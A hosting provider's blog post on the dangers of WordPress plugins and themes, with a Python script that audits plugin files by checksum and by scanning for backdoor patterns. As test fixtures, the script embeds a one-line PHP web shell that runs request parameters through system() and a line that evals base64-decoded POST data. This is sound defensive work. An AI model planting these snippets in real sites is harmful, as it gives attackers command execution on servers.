Cloudhub Blog

The latest news and announcements about our cloud infrastructure.

The Dangers Of WordPress Plugins And Themes

  • 09/05/2018

From its humble beginnings as simple blogging software, WordPress is now estimated to power more than 30% of the top 10 million websites in the world. One of the factors that has increased WordPress's popularity is the ease with which plugins and themes can be created to extend it and provide more functionality than the default setup.

At the time of writing the WordPress website lists more than 56,000 plugins alongside thousands of themes. Plugins and themes are available from the official WordPress website and from many other sites across the internet. Some are free, while others require payment to use. Everyone likes something for nothing, so free theme and plugin sites are very popular.

So what problems can you face when adding plugins and themes to your WordPress site?

The first issue is that it is easy for almost anyone to write a plugin or theme for WordPress, so not every plugin has been built by a professional web developer: some are made by amateurs with varying degrees of expertise and experience. This can lead to plugins that are badly written, slow and buggy. Some will slow a website to a crawl; others are so poorly developed that they slow your whole VPS to a crawl while carrying out their task. A further problem with badly written plugins is that they can contain bugs that make it trivial for an attacker to compromise your website, and then possibly your whole VPS.

However, poor plugins are not the only threat. Because anyone can write plugins and themes, some hackers write their own or modify existing ones. Rather than merely containing bugs that could be exploited, the plugins and themes that hackers modify ship with malware built in for the hacker to use. This malware ranges from simple scripts that send spam on the hacker's behalf through to full custom web shells that let the hacker control the server through a web page as if they had SSH access to it. Unless you know what you are looking for, a legitimate theme or plugin can look much the same as a backdoored one, which makes it difficult to detect before the malware is being used to abuse the server.

How to detect a bad WordPress plugin or theme:

Generally, the first you will know of a bad WordPress plugin or theme on your server is when its effects are felt: the server overloads, or you receive abuse complaints about spam or worse originating from your server.
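A check you can run before the effects are felt is to compare the plugin's files on disk with the hashes published for the pristine release, and to scan the PHP for the obfuscation and command-execution constructs that injected backdoors and web shells rely on. The script below is an added example written for this post, not code from the original page or from WordPress. The manifest layout it expects, {"files": {"relative/path.php": {"sha256": "..."}}}, is an assumption modelled on the WordPress.org plugin-checksums endpoint, and the plugin files it audits (one clean file, one file modified after install, one dropped-in shell) are constructed inline.

```python
"""Spot tampered or suspicious files in a WordPress plugin directory.

Added example, not WordPress code. Two checks:
 1. Compare every file under the plugin directory with a checksum manifest
    for the pristine release. The manifest layout used here,
    {"files": {"relative/path.php": {"sha256": "..."}}}, is an assumption
    modelled on the WordPress.org plugin-checksums endpoint.
 2. Scan the PHP for constructs typical of injected backdoors and web shells.
"""
import hashlib
import os
import re
import shutil
import tempfile

# Heuristic indicators. Legitimate code can call base64_decode, so a hit is a
# lead to inspect, not proof of compromise.
SUSPICIOUS_PATTERNS = [
    # eval() fed by a decoder: eval(base64_decode(...)), eval(gzinflate(...))
    re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    # shell execution driven directly by request data: system($_REQUEST['cmd'])
    re.compile(rb"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"),
    # runs of hex-escaped bytes hiding function names: "\x65\x76\x61\x6c"
    re.compile(rb"(\\x[0-9a-fA-F]{2}){4,}"),
    # variable function called on request data: $f($_POST['x'])
    re.compile(rb"\$[A-Za-z_]\w*\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
]


def walk_files(plugin_dir):
    """Yield (relative POSIX path, absolute path) for every file under plugin_dir."""
    for root, _dirs, files in os.walk(plugin_dir):
        for name in files:
            full = os.path.join(root, name)
            yield os.path.relpath(full, plugin_dir).replace(os.sep, "/"), full


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_against_manifest(plugin_dir, manifest):
    """Return sorted lists (modified, unexpected, missing) of relative paths."""
    expected = manifest["files"]
    on_disk = {rel: sha256_file(full) for rel, full in walk_files(plugin_dir)}
    modified = sorted(p for p in expected if p in on_disk and on_disk[p] != expected[p]["sha256"])
    unexpected = sorted(p for p in on_disk if p not in expected)   # files the release never shipped
    missing = sorted(p for p in expected if p not in on_disk)
    return modified, unexpected, missing


def scan_for_indicators(plugin_dir):
    """Return {relative_path: [indices into SUSPICIOUS_PATTERNS]} for PHP files with hits."""
    hits = {}
    for rel, full in walk_files(plugin_dir):
        if not rel.endswith((".php", ".phtml", ".inc")):
            continue
        with open(full, "rb") as f:
            data = f.read()
        matched = [i for i, pat in enumerate(SUSPICIOUS_PATTERNS) if pat.search(data)]
        if matched:
            hits[rel] = matched
    return hits


# Constructed sample plugin (not a real one): a clean main file, a helper that
# was modified after install, and a dropped-in shell absent from the manifest.
CLEAN_MAIN = b"<?php\n/*\nPlugin Name: Example Widget\n*/\nfunction ex_widget() { return 'hi'; }\n"
ORIGINAL_HELPER = b"<?php\nfunction ex_helper() {}\n"
TAMPERED_HELPER = ORIGINAL_HELPER + b"eval(base64_decode($_POST['c']));\n"
DROPPED_SHELL = b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); }\n"


def build_sample_plugin():
    """Write the constructed files to a temp dir; return (dir, manifest of the pristine release)."""
    d = tempfile.mkdtemp(prefix="wp-plugin-")
    os.makedirs(os.path.join(d, "inc"))
    for rel, data in (("example-widget.php", CLEAN_MAIN),
                      ("inc/helper.php", TAMPERED_HELPER),
                      ("inc/wp-cache.php", DROPPED_SHELL)):
        with open(os.path.join(d, *rel.split("/")), "wb") as f:
            f.write(data)
    manifest = {"files": {
        "example-widget.php": {"sha256": hashlib.sha256(CLEAN_MAIN).hexdigest()},
        "inc/helper.php": {"sha256": hashlib.sha256(ORIGINAL_HELPER).hexdigest()},
    }}
    return d, manifest


def audit_sample():
    """Build the constructed plugin, audit it, clean up, and return the findings."""
    d, manifest = build_sample_plugin()
    try:
        modified, unexpected, missing = verify_against_manifest(d, manifest)
        indicators = scan_for_indicators(d)
    finally:
        shutil.rmtree(d)
    return {"modified": modified, "unexpected": unexpected, "missing": missing,
            "indicators": indicators}


if __name__ == "__main__":
    for key, value in audit_sample().items():
        print(f"{key}: {value}")
```

The manifest comparison is the stronger signal: a file the release never shipped, or one whose hash no longer matches, is worth pulling regardless of what it contains. The indicator scan is there for plugins with no published checksums and for a quick look at what a flagged file does; a file that is both unexpected and matches an indicator is the first one to inspect.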

So what can you do about it?

It is easy to advise never using any plugins or themes on your WordPress site, but that becomes impractical when you are actually trying to set up a fully functioning site. The best thing to do is to be selective about the plugins and themes that you use.

First, only install the plugins and themes that you really need, and uninstall any that you don't; an inactive plugin left on disk is still code an attacker can reach.
Second, make sure that you only get plugins and themes from respectable websites. If you aren't sure of the standard of a site, do some research and see what the community says.
Third, check who created the plugin and when it was last updated: good creators gain a reputation in the community, and a regularly updated plugin or theme shows a creator who fixes flaws as they are found.